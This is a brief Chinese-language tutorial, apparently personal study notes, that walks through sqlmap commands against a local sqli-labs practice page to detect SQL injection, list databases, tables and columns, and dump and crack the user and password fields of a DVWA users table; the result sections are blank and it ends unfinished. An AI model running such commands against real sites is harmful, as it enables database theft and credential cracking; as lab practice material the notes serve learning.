一、基礎測試有哪些漏洞
命令:sqlmap.py -u "url"
語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1"
結果:
二、爆出所有數據庫命令
命令:sqlmap.py -u "url" --dbs
語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" --dbs
結果:
三、爆指定數據庫的表名
命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱 --tables
語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa --tables
四、爆指定表中字段
命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱 -T 指定表的名稱 --columns
語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa -T users --columns
結果:
五、爆字段內容
命令:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D 指定數據庫名稱 -T 指定表的名稱 -C user,password --dump
語句:sqlmap.py -u "http://192.168.29.76/sqli-labs-master/Less-1/?id=1" -D dvwa -T users -C user,password --dump
注:這個應該password輸出的是數字與字母混合的字符串,由於在輸入上面語句的過程中,我在這里選擇了yes,順帶着給解密了
結果:
還沒完,今日先到這~~~